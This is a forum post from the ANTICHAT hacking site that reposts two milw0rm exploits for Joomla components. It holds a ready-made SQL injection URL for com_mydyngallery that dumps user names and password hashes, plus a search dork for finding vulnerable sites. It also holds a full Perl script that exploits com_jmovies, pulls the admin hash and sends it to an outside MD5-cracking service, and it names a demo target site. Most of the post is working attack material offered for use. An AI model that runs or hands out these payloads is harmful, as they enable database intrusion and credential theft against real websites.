ANTICHAT - Показать сообщение отдельно - Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln

PHP код:


		
			
Joomla Component mydyngallery                                                                                               AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                              

Discovered by : Sina Yazdanmehr (R3d.W0rm)                                        

Our Site : Http://IRCRASH.COM                                                      

IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi      

                                                                          

Download : http://mydyngallery.mon-cottenchy.fr                                                                            

DORK : inurl:option=com_mydyngallery                                        

                                       [Bug]                                       

#http://Site/[joomla_path]/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/*

Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit

PHP код:


		
			
#!/usr/bin/perl -w

# -----------------------------------------------------------

# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit

# by s3rg3770 with athos :)

# demo http://www.disneyrama.com

# -----------------------------------------------------------

# Note: In lulz we trust :O

# -----------------------------------------------------------



use strict;

use LWP::UserAgent;

use LWP::Simple;





my $host = shift;

my $myid = shift or &help;



my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".

           "union+select+1,concat(0x215F,username,0x3a,password,0x215F)+".

           "from+jos_users+where+id=${myid}--";



my $http = new LWP::UserAgent(

                               agent   => 'Mozilla/4.5 [en] (Win95; U)',

                               timeout => '5',

                             );  





my $response = $http->get($host.$path); 



if($response->content =~ /!_(.+?)!_/i)

{

     print STDOUT "Hash MD5: $1\n";

     print STDOUT "Password: ".search_md5($1)."\n";

     exit;

}

else

{

     print STDOUT "Exploit Failed!\n";

     exit;

}







sub search_md5

{

     my $hash = shift @_;

     my $cont = undef;



     $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);

        

     if(length($hash) < 32 && !is_error($cont))

     {

          return $cont;

     }

}   





sub help

{

     print STDOUT "Usage: perl $0 [host] [user ID]\n";

     print STDOUT "by athos - staker[at]hotmail[dot]it\n";

     exit;

}

(c) milw0rm.com [2008-12-03 - 2008-12-04]